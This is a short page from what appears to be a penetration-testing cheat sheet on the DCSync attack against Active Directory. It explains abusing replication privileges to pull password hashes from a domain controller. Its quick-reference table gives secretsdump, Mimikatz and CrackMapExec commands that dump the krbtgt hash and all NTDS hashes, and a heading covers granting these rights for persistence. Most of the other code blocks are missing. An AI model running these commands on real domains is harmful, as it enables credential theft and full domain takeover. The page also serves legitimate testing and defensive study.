Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
AbuseDS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges to replicate password data from DC. No need to run code on DC.
Requirements
- Domain Admins, Enterprise Admins, or
- Account with replication rights (DCSync rights)
Impacket — secretsdump
Single User
All Users
With Hash (PtH)
NTDS Only (No SAM/LSA)
Mimikatz
CrackMapExec
Check DCSync Rights
PowerView
Manual
Look for these rights on domain object:DS-Replication-Get-Changes(GUID: 1131f6aa-…)DS-Replication-Get-Changes-All(GUID: 1131f6ad-…)
Grant DCSync Rights (Persistence)
Quick Reference
| Task | Command |
|---|---|
| Single user | secretsdump DOMAIN/admin:pass@DC -just-dc-user krbtgt |
| All hashes | secretsdump DOMAIN/admin:pass@DC -just-dc |
| Mimikatz | lsadump::dcsync /domain:dom.local /user:admin |
| CME | crackmapexec smb DC -u admin -p pass --ntds |